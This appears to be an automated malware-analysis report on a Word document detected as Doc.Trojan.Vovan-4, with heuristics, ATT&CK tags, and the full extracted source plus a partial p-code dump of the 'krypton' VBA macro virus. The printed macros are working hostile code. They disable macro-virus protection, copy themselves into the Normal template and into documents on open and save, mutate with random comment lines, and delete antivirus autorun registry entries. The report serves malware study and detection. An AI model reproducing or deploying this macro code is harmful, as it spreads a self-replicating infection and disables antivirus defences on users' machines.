MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Vovan-4'. It contains VBA macros, including 'AutoOpen' and 'Document_Open' routines, which are common for macro-based malware. The script attempts to obfuscate its functionality and modify document properties, suggesting an intent to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Trojan.Vovan-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Vovan-4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.replaceline 123, "Sub AutoExec()" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
.replaceline 138, "Sub AutoOpen()" -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38123 bytes |
SHA-256: d501baf0cb11f058286ef21e9c2a61a0533246ec11593ab55ccca835794b4bbe |
|||
|
Detection
ClamAV:
Doc.Trojan.Vovan-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "krypton"
Private Sub Document_Open()
On Error Resume Next
krypton:
Application.EnableCancelKey = 0
Application.ShowVisualBasicEditor = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
ActiveDocument.ReadOnlyRecommended = 0
Application.ScreenUpdating = 0
If ActiveDocument.ReadOnly = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
If NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 1) = "krypton:" Then NTinf = True
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1) = "krypton:" Then ATinf = True
If NTinf = True And ATinf = True Then End
If NormalTemplate.VBProject.VBComponents(1).Name = "krypton" Then End
If ActiveDocument.VBProject.VBComponents(1).Name = "krypton" Then End
If NTinf = False Then
Set JI = NormalTemplate.VBProject.VBComponents(1).CodeModule
With ActiveDocument.VBProject.VBComponents(1).CodeModule
.replaceline 123, "Sub AutoExec()"
.replaceline 138, "Sub AutoOpen()"
.replaceline 152, "Sub FileSave()"
.replaceline 160, "Sub FileSaveAs()"
.replaceline 168, "Sub ViewVBcode()"
.replaceline 170, "Sub ToolsMacro()"
.replaceline 172, "Sub AutoExit()"
.replaceline 176, "Sub ToolsOptions()"
.replaceline 182, "Sub Mutation()"
.replaceline 193, "Sub xxx()"
.replaceline 204, "Sub Antigen()"
CI = .Lines(1, .CountOfLines)
End With
With JI
.DeleteLines 1, .CountOfLines
.InsertLines 1, CI
End With
With ActiveDocument.VBProject.VBComponents(1).CodeModule
.replaceline 123, "Private Sub aaa()"
.replaceline 138, "Private Sub bbb()"
.replaceline 152, "Private Sub ccc()"
.replaceline 160, "Private Sub ddd()"
.replaceline 168, "Private Sub eee()"
.replaceline 170, "Private Sub fff()"
.replaceline 172, "Private Sub ggg()"
.replaceline 176, "Private Sub hhh()"
.replaceline 182, "Private Sub iii()"
.replaceline 193, "Private Sub kkk()"
.replaceline 204, "Private Sub lll()"
CI = .Lines(1, .CountOfLines)
End With
End If
If Document = False Then
Set HI = ActiveDocument.VBProject.VBComponents(1).CodeModule
With NormalTemplate.VBProject.VBComponents(1).CodeModule
.replaceline 123, "Private Sub aaa()"
.replaceline 138, "Private Sub bbb()"
.replaceline 152, "Private Sub ccc()"
.replaceline 160, "Private Sub ddd()"
.replaceline 168, "Private Sub eee()"
.replaceline 170, "Private Sub fff()"
.replaceline 172, "Private Sub ggg()"
.replaceline 176, "Private Sub hhh()"
.replaceline 182, "Private Sub iii()"
.replaceline 193, "Private Sub kkk()"
.replaceline 204, "Private Sub lll()"
CI = .Lines(1, .CountOfLines)
End With
With HI
.DeleteLines 1, .CountOfLines
.InsertLines 1, CI
End With
With NormalTemplate.VBProject.VBComponents(1).CodeModule
.replaceline 123, "Sub AutoExec()"
.replaceline 138, "Sub AutoOpen()"
.replaceline 152, "Sub FileSave()"
.replaceline 160, "Sub FileSaveAs()"
.replaceline 168, "Sub ViewVBcode()"
.replaceline 170, "Sub ToolsMacro()"
.replaceline 172, "Sub AutoExit()"
.replaceline 176, "Sub ToolsOptions()"
.replaceline 182, "Sub Mutation()"
.replaceline 193, "Sub xxx()"
.replaceline 204, "Sub Antigen()"
End With
End If
ActiveDocument.SaveAs ActiveDocument.FullName
End Sub
Private Sub Document_Close()
On Error Resume Next
Application.ScreenUpdating = 0
If ActiveDocument.Name = ActiveDocument.FullName Then End
If ActiveDocument.Saved = True Then GoTo 1 Else GoTo 2
1: Call Document_Open
2: ActiveDocument.Close
End Sub
Private Sub Document_New(): On Error Resume Next
Dim H: Randomize: H = Int((2 * Rnd) + 1)
If H = 1 Then GoTo 1
If H = 2 Then End
1: With NormalTemplate.VBProject.VBComponents(1).CodeModule
.replaceline 193, "Sub FileOpen()": End With
Dim V: Randomize: V = Int((2 * Rnd) + 1): If V = 1 Then Call Mutation Else Call Antigen
Open "krypton.bas" For Output As #1
Print #1, "Attribute VB_Name = " & Chr(34) & "krypton" & Chr(34)
Close #1
NormalTemplate.VBProject.VBComponents.Import ("krypton.bas")
Kill "krypton.bas"
Set ND = NormalTemplate.VBProject.VBComponents("krypton").CodeModule
With ThisDocument.VBProject.VBComponents(1).CodeModule
VC = .Lines(1, .CountOfLines)
End With
With ND
.DeleteLines 1, .CountOfLines
.InsertLines 1, VC
End With
Set SS = NormalTemplate.VBProject.VBComponents(1).CodeModule
With SS
.DeleteLines 1, .CountOfLines
End With
End Sub
Sub AutoExec()
Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
On Error GoTo 1
With NormalTemplate.VBProject.VBComponents("krypton").CodeModule
.replaceline 193, "Sub xxx()": End With: Dim R: Randomize: R = Int((2 * Rnd) + 1): If R = 1 Then Call Mutation Else Call Antigen
Set ND = ThisDocument.VBProject.VBComponents(1).CodeModule
With NormalTemplate.VBProject.VBComponents("krypton").CodeModule
VC = .Lines(1, .CountOfLines): End With
With ND
.DeleteLines 1, .CountOfLines
.InsertLines 1, VC
End With
Application.OrganizerDelete NormalTemplate.FullName, "krypton", wdOrganizerObjectProjectItems
1: End Sub
Sub AutoOpen()
On Error Resume Next
Application.EnableCancelKey = 0
Application.ShowVisualBasicEditor = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
ActiveDocument.ReadOnlyRecommended = 0
Application.ScreenUpdating = 0
If NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 1) = "krypton:" Then End
If NormalTemplate.VBProject.VBComponents(1).Name = "krypton" Then End
Dim S: Randomize: S = Int((2 * Rnd) + 1): If S = 1 Then Call Mutation Else Call Antigen
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="krypton", Object:=wdOrganizerObjectProjectItems
NormalTemplate.Save
End Sub
Sub FileSave()
On Error Resume Next
Application.ScreenUpdating = 0
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1) = "krypton:" Then GoTo 1
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="krypton", Object:=wdOrganizerObjectProjectItems
Dim P: Randomize: P = Int((2 * Rnd) + 1): If P = 1 Then Call Mutation Else Call Antigen
1: ActiveDocument.Save
End Sub
Sub FileSaveAs()
On Error Resume Next
Application.ScreenUpdating = 0
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1) = "krypton:" Then GoTo 1
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="krypton", Object:=wdOrganizerObjectProjectItems
Dim T: Randomize: T = Int((2 * Rnd) + 1): If T = 1 Then Call Mutation Else Call Antigen
1: Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub ViewVBcode()
End Sub
Sub ToolsMacro()
End Sub
Sub AutoExit()
Options.VirusProtection = 1
Dim W: Randomize: W = Int((2 * Rnd) + 1): If W = 1 Then Call Mutation Else Call Antigen
End Sub
Sub ToolsOptions()
On Error Resume Next: Options.VirusProtection = 1: Options.SaveNormalPrompt = 1
If Dialogs(wdDialogToolsOptions).Show Then
End If
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
End Sub
Sub Mutation()
On Error Resume Next
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "AVPCC") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices", "AVPCC Service") = ""
jXjX = Int(Rnd() * 15 + 1)
For Mutagen = 1 To jXjX
ZjZj = Application.VBE.ActiveVBProject.VBComponents("krypton").CodeModule.CountOfLines
a = Rnd * 455: b = Rnd * 80: C = Rnd * 160: D = Rnd * 180: e = Rnd * 49
Application.VBE.ActiveVBProject.VBComponents("krypton").CodeModule.InsertLines ZjZj, "'" & a & vbTab & b & vbTab & C & vbTab & D & vbTab & e
Next Mutagen
End Sub
Sub FileOpen()
On Error Resume Next: WordBasic.DisableAutoMacros
Dialogs(wdDialogFileOpen).Show
WordBasic.EnableAutoMacros
Application.ScreenUpdating = 0: Application.ShowVisualBasicEditor = 0
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1) = "krypton:" Then End
If ActiveDocument.VBProject.VBComponents(1).Name = "krypton" Then End
Dim C: Randomize: C = Int((2 * Rnd) + 1): If C = 1 Then Call Mutation Else Call Antigen
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="krypton", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End Sub
Sub Antigen()
On Error Resume Next
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) = "krypton:" Then GoTo 2
1: For O = 1 To ActiveDocument.VBProject.VBComponents("krypton").CodeModule.CountOfLines
e = Mid(ActiveDocument.VBProject.VBComponents("krypton").CodeModule.Lines(O, 1), 1, 1)
If e = "'" Then ActiveDocument.VBProject.VBComponents("krypton").CodeModule.DeleteLines O, 1
Next O
GoTo 3
2: For O = 1 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
e = Mid(ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(O, 1), 1, 1)
If e = "'" Then ThisDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines O, 1
Next O
3:
End Sub
Rem
Rem MMM MMMMMMMMM MM
Rem MMMMMMMM MMMMMMMMMMMMMMMM MMMMMM
Rem MMMMMMMMMMMMMMM/"""""""\MMMMMMMMMMMMMMMMMMMMM
Rem MMMMMMMMMMMMMM\______/MMMMMMMMMMMMMMMMMMMMMM
Rem MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
Rem MMMM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
Rem MMM MMMMMMMMMMMMM MMMMMMMMMM
Rem MMM MMMMMMMMMMM RUSSIA MMMMMMMM
Rem MM MMMMMMMM M MMMMMMM
Rem MM MMMMMMMMM MMM MMMMMM
Rem MMMMMMMMMMMMMM MMMMM MMMMMM
Rem MM MMMMMMMMMMMMMMMMMMMMMMMM MMMM
Rem MMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMM
Rem MMMMMMMMMM MM
Rem
Rem CLASS<----->MODULE
'365,525 59,20581 83,50233 105,8398 29,03204
'299,4155 12,93908 117,9289 34,11182 48,23703
'36,54723 43,05481 58,47473 174,3338 41,26579
'163,9571 66,07912 8,951941 76,12047 16,61564
'444,4889 47,33968 15,98818 126,8495 46,05212
'351,934 47,44403 57,65702 147,2218 41,86513
'207,0521 56,80956 33,7978 107,3695 34,90673
' Processing file: /tmp/qstore_fspj9pl8
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/krypton - 16142 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Label krypton
' Line #3:
' LitDI2 0x0000
' Ld Application
' MemSt EnableCancelKey
' Line #4:
' LitDI2 0x0000
' Ld Application
' MemSt ShowVisualBasicEditor
' Line #5:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #6:
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #7:
' LitDI2 0x0000
' Ld ActiveDocument
' MemSt ReadOnlyRecommended
' Line #8:
' LitDI2 0x0000
' Ld Application
' MemSt ScreenUpdating
' Line #9:
' Ld ActiveDocument
' MemLd ReadOnly
' LitDI2 0x0001
' Eq
' IfBlock
' Line #10:
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0000
' ArgsCall SetAttr 0x0002
' Line #11:
' Ld ActiveDocument
' ArgsMemCall Reload 0x0000
' Line #12:
' EndIfBlock
' Line #13:
' LitDI2 0x0003
' LitDI2 0x0001
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0008 "krypton:"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St NTinf
' EndIf
' Line #14:
' LitDI2 0x0003
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0008 "krypton:"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St ATinf
' EndIf
' Line #15:
' Ld NTinf
' LitVarSpecial (True)
' Eq
' Ld ATinf
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' End
' EndIf
' Line #16:
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0007 "krypton"
' Eq
' If
' BoSImplicit
' End
' EndIf
' Line #17:
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0007 "krypton"
' Eq
' If
' BoSImplicit
' End
' EndIf
' Line #18:
' Ld NTinf
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #19:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set JI
' Line #20:
' StartWithExpr
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #21:
' LitDI2 0x007B
' LitStr 0x000E "Sub AutoExec()"
' ArgsMemCallWith replaceline 0x0002
' Line #22:
' LitDI2 0x008A
' LitStr 0x000E "Sub AutoOpen()"
' ArgsMemCallWith replaceline 0x0002
' Line #23:
' LitDI2 0x0098
' LitStr 0x000E "Sub FileSave()"
' ArgsMemCallWith replaceline 0x0002
' Line #24:
' LitDI2 0x00A0
' LitStr 0x0010 "Sub FileSaveAs()"
' ArgsMemCallWith replaceline 0x0002
' Line #25:
' LitDI2 0x00A8
' LitStr 0x0010 "Sub ViewVBcode()"
' ArgsMemCallWith replaceline 0x0002
' Line #26:
' LitDI2 0x00AA
' LitStr 0x0010 "Sub ToolsMacro()"
' ArgsMemCallWith replaceline 0x0002
' Line #27:
' LitDI2 0x00AC
' LitStr 0x000E "Sub AutoExit()"
' ArgsMemCallWith replaceline 0x0002
' Line #28:
' LitDI2 0x00B0
' LitStr 0x0012 "Sub ToolsOptions()"
' ArgsMemCallWith replaceline 0x0002
' Line #29:
' LitDI2 0x00B6
' LitStr 0x000E "Sub Mutation()"
' ArgsMemCallWith replaceline 0x0002
' Line #30:
' LitDI2 0x00C1
' LitStr 0x0009 "Sub xxx()"
' ArgsMemCallWith replaceline 0x0002
' Line #31:
' LitDI2 0x00CC
' LitStr 0x000D "Sub Antigen()"
' ArgsMemCallWith replaceline 0x0002
' Line #32:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemLdWith Lines 0x0002
' St CI
' Line #33:
' EndWith
' Line #34:
' StartWithExpr
' Ld JI
' With
' Line #35:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemCallWith DeleteLines 0x0002
' Line #36:
' LitDI2 0x0001
' Ld CI
' ArgsMemCallWith InsertLines 0x0002
' Line #37:
' EndWith
' Line #38:
' StartWithExpr
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #39:
' LitDI2 0x007B
' LitStr 0x0011 "Private Sub aaa()"
' ArgsMemCallWith replaceline 0x0002
' Line #40:
' LitDI2 0x008A
' LitStr 0x0011 "Private Sub bbb()"
' ArgsMemCallWith replaceline 0x0002
' Line #41:
' LitDI2 0x0098
' LitStr 0x0011 "Private Sub ccc()"
' ArgsMemCallWith replaceline 0x0002
' Line #42:
' LitDI2 0x00A0
' LitStr 0x0011 "Private Sub ddd()"
' ArgsMemCallWith replaceline 0x0002
' Line #43:
' LitDI2 0x00A8
' LitStr 0x0011 "Private Sub eee()"
' ArgsMemCallWith replaceline 0x0002
' Line #44:
' LitDI2 0x00AA
' LitStr 0x0011 "Private Sub fff()"
' ArgsMemCallWith replaceline 0x0002
' Line #45:
' LitDI2 0x00AC
' LitStr 0x0011 "Private Sub ggg()"
' ArgsMemCallWith replaceline 0x0002
' Line #46:
' LitDI2 0x00B0
' LitStr 0x0011 "Private Sub hhh()"
' ArgsMemCallWith replaceline 0x0002
' Line #47:
' LitDI2 0x00B6
' LitStr 0x0011 "Private Sub iii()"
' ArgsMemCallWith replaceline 0x0002
' Line #48:
' LitDI2 0x00C1
' LitStr 0x0011 "Private Sub kkk()"
' ArgsMemCallWith replaceline 0x0002
' Line #49:
' LitDI2 0x00CC
' LitStr 0x0011 "Private Sub lll()"
' ArgsMemCallWith replaceline 0x0002
' Line #50:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemLdWith Lines 0x0002
' St CI
' Line #51:
' EndWith
' Line #52:
' EndIfBlock
' Line #53:
' Ld Document
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #54:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set HI
' Line #55:
' StartWithExpr
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #56:
' LitDI2 0x007B
' LitStr 0x0011 "Private Sub aaa()"
' ArgsMemCallWith replaceline 0x0002
' Line #57:
' LitDI2 0x008A
' LitStr 0x0011 "Private Sub bbb()"
' ArgsMemCallWith replaceline 0x0002
' Line #58:
' LitDI2 0x0098
' LitStr 0x0011 "Private Sub ccc()"
' ArgsMemCallWith replaceline 0x0002
' Line #59:
' LitDI2 0x00A0
' LitStr 0x0011 "Private Sub ddd()"
' ArgsMemCallWith replaceline 0x0002
' Line #60:
' LitDI2 0x00A8
' LitStr 0x0011 "Private Sub eee()"
' ArgsMemCallWith replaceline 0x0002
' Line #61:
' LitDI2 0x00AA
' LitStr 0x0011 "Private Sub fff()"
' ArgsMemCallWith replaceline 0x0002
' Line #62:
' LitDI2 0x00AC
' LitStr 0x0011 "Private Sub ggg()"
' ArgsMemCallWith replaceline 0x0002
' Line #63:
' LitDI2 0x00B0
' LitStr 0x0011 "Private Sub hhh()"
' ArgsMemCallWith replaceline 0x0002
' Line #64:
' LitDI2 0x00B6
' LitStr 0x0011 "Private Sub iii()"
' ArgsMemCallWith replaceline 0x0002
' Line #65:
' LitDI2 0x00C1
' LitStr 0x0011 "Private Sub kkk()"
' ArgsMemCallWith replaceline 0x0002
' Line #66:
' LitDI2 0x00CC
' LitStr 0x0011 "Private Sub lll()"
' ArgsMemCallWith replaceline 0x0002
' Line #67:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemLdWith Lines 0x0002
' St CI
' Line #68:
' EndWith
' Line #69:
' StartWithExpr
' Ld HI
' With
' Line #70:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemCallWith DeleteLines 0x0002
' Line #71:
' LitDI2 0x0001
' Ld CI
' ArgsMemCallWith InsertLines 0x0002
' Line #72:
' EndWith
' Line #73:
' StartWithExpr
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #74:
' LitDI2 0x007B
' LitStr 0x000E "Sub AutoExec()"
' ArgsMemCallWith replaceline 0x0002
' Line #75:
' LitDI2 0x008A
' LitStr 0x000E "Sub AutoOpen()"
' ArgsMemCallWith replaceline 0x0002
' Line #76:
' LitDI2 0x0098
' LitStr 0x000E "Sub FileSave()"
' ArgsMemCallWith replaceline 0x0002
' Line #77:
' LitDI2 0x00A0
' LitStr 0x0010 "Sub FileSaveAs()"
' ArgsMemCallWith replaceline 0x0002
' Line #78:
' LitDI2 0x00A8
' LitStr 0x0010 "Sub ViewVBcode()"
' ArgsMemCallWith replaceline 0x0002
' Line #79:
' LitDI2 0x00AA
' LitStr 0x0010 "Sub ToolsMacro()"
' ArgsMemCallWith replaceline 0x0002
' Line #80:
' LitDI2 0x00AC
' LitStr 0x000E "Sub AutoExit()"
' ArgsMemCallWith replaceline 0x0002
' Line #81:
' LitDI2 0x00B0
' LitStr 0x0012 "Sub ToolsOptions()"
' ArgsMemCallWith replaceline 0x0002
' Line #82:
' LitDI2 0x00B6
' LitStr 0x000E "Sub Mutation()"
' ArgsMemCallWith replaceline 0x0002
' Line #83:
' LitDI2 0x00C1
' LitStr 0x0009 "Sub xxx()"
' ArgsMemCallWith replaceline 0x0002
' Line #84:
' LitDI2 0x00CC
' LitStr 0x000D "Sub Antigen()"
' ArgsMemCallWith replaceline 0x0002
' Line #85:
' EndWith
' Line #86:
' EndIfBlock
' Line #87:
' Ld ActiveDocument
' MemLd FullName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' Line #88:
' EndSub
' Line #89:
' FuncDefn (Private Sub Document_Close())
' Line #90:
' OnError (Resume Next)
' Line #91:
' LitDI2 0x0000
' Ld Application
' MemSt ScreenUpdating
' Line #92:
' Ld ActiveDocument
' MemLd New
' Ld ActiveDocument
' MemLd FullName
' Eq
' If
' BoSImplicit
' End
' EndIf
' Line #93:
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' GoTo 1
' Else
' BoSImplicit
' GoTo 2
' EndIf
' Line #94:
' LineNum 1
' BoS 0x0003
' ArgsCall (Call) Document_Open 0x0000
' Line #95:
' LineNum 2
' BoS 0x0003
' Ld ActiveDocument
' ArgsMemCall Close 0x0000
' Line #96:
' EndSub
' Line #97:
' FuncDefn (Private Sub Document_New())
' BoS 0x0000
' OnError (Resume Next)
' Line #98:
' Dim
' VarDefn H
' BoS 0x0000
' ArgsCall Read 0x0000
' BoS 0x0000
' LitDI2 0x0002
' Ld Rnd
' Mul
' Paren
' LitDI2 0x0001
' Add
' FnInt
' St H
' Line #99:
' Ld H
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' GoTo 1
' EndIf
' Line #100:
' Ld H
' LitDI2 0x0002
' Eq
' If
' BoSImplicit
' End
' EndIf
' Line #101:
' LineNum 1
' BoS 0x0003
' StartWithExpr
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #102:
' LitDI2 0x00C1
' LitStr 0x000E "Sub FileOpen()"
' ArgsMemCallWith replaceline 0x0002
' BoS 0x0000
' EndWith
' Line #103:
' Dim
' VarDefn V
' BoS 0x0000
' ArgsCall Read 0x0000
' BoS 0x0000
' LitDI2 0x0002
' Ld Rnd
' Mul
' Paren
' LitDI2 0x0001
' Add
' FnInt
' St V
' BoS 0x0000
' Ld V
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' ArgsCall (Call) Mutation 0x0000
' Else
' BoSImplicit
' ArgsCall (Call) Antigen 0x0000
' EndIf
' Line #104:
' LitStr 0x000B "krypton.bas"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #105:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0014 "Attribute VB_Name = "
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0007 "krypton"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' PrintItemNL
' Line #106:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #107:
' LitStr 0x000B "krypton.bas"
' Paren
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #108:
' LitStr 0x000B "krypton.bas"
' ArgsCall Kill 0x0001
' Line #109:
' SetStmt
' LitStr 0x0007 "krypton"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set ND
' Line #110:
' StartWithExpr
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #111:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemLdWith Lines 0x0002
' St VC
' Line #112:
' EndWith
' Line #113:
' StartWithExpr
' Ld ND
' With
' Line #114:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemCallWith DeleteLines 0x0002
' Line #115:
' LitDI2 0x0001
' Ld VC
' ArgsMemCallWith InsertLines 0x0002
' Line #116:
' EndWith
' Line #117:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set SS
' Line #118:
' StartWithExpr
' Ld SS
' With
' Line #119:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemCallWith DeleteLines 0x0002
' Line #120:
' EndWith
' Line #121:
' EndSub
' Line #122:
' FuncDefn (Sub AutoExec())
' Line #123:
' LitDI2 0x0000
' Ld Application
' MemSt EnableCancelKey
' BoS 0x0000
' LitDI2 0x0000
' Ld Application
' MemSt ShowVisualBasicEditor
' Line #124:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' BoS 0x0000
' LitDI2 0x0000
' Ld Options
' MemSt SaveNormalPrompt
' Line #125:
' OnError 1
' Line #126:
' StartWithExpr
' LitStr 0x0007 "krypton"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #127:
' LitDI2 0x00C1
' LitStr 0x0009 "Sub xxx()"
' ArgsMemCallWith replaceline 0x0002
' BoS 0x0000
' EndWith
' BoS 0x0000
' Dim
' VarDefn R
' BoS 0x0000
' ArgsCall Read 0x0000
' BoS 0x0000
' LitDI2 0x0002
' Ld Rnd
' Mul
' Paren
' LitDI2 0x0001
' Add
' FnInt
' St R
' BoS 0x0000
' Ld R
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' ArgsCall (Call) Mutation 0x0000
' Else
' BoSImplicit
' ArgsCall (Call) Antigen 0x0000
' EndIf
' Line #128:
' SetStmt
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set ND
' Line #129:
' StartWithExpr
' LitStr 0x0007 "krypton"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' With
' Line #130:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemLdWith Lines 0x0002
' St VC
' BoS 0x0000
' EndWith
' Line #131:
' StartWithExpr
' Ld ND
' With
' Line #132:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemCallWith DeleteLines 0x0002
' Line #133:
' LitDI2 0x0001
' Ld VC
' ArgsMemCallWith InsertLines 0x0002
' Line #134:
' EndWith
' Line #135:
' Ld NormalTemplate
' MemLd FullName
' LitStr 0x0007 "krypton"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerDelete 0x0003
' Line #136:
' LineNum 1
' BoS 0x0003
' EndSub
' Line #137:
' FuncDefn (Sub AutoOpen())
' Line #138:
' OnError (Resume Next)
' Line #139:
' LitDI2 0x0000
' Ld Application
' MemSt EnableCancelKey
' Line #140:
' LitDI2 0x0000
' Ld Application
' MemSt ShowVisualBasicEditor
' Line #141:
' LitDI2 0x0000
' Ld Options
' MemSt VirusProtection
' Line #142:
' LitDI2 0x0000
…
